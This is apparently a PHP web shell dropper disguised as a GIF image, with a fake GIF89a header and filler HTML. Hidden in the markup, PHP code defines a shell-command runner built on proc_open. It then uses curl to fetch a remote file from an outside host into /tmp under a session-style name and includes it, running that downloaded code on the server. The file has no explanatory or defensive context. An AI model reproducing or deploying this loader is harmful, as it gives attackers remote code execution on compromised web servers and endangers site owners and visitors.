GIF89a£ºuRgvTTRRTRTRTRTTRRTTR
<!DOCTYPE html>
uRiuTTRRTTRRTTRRTTRTRTRTR

<!DOCTYPE html>uiuTRRTTRTRTRTTRRT
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TuyuyyuuyuuyuyTRYTRTRTRTRTRRTTRRT</title>
<?=
error_reporting(E_ALL);
ini_set('display_errors', 1);

function ex($coman, $serlok)
{
	$ler = "2>&1";
	if (!preg_match("/" . $ler . "/i", $coman)) {
		$coman = $coman . " " . $ler;
	}
	$pr = "proc_open";
	if (function_exists($pr)) {
		$tod = @$pr($coman, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
		echo htmlspecialchars(stream_get_contents($crottz[1]));
	} else {
		return false;
	}
}

$fname = "sess_" . md5("nax") . ".php";
if (!file_exists("/tmp/$fname") || filesize("/tmp/$fname") < 10) {
    ex("curl --output /tmp/$fname https://buktijptoto21.online/admin/assets/js/aaaa.txt", "/tmp");
}
include("/tmp/$fname");
?>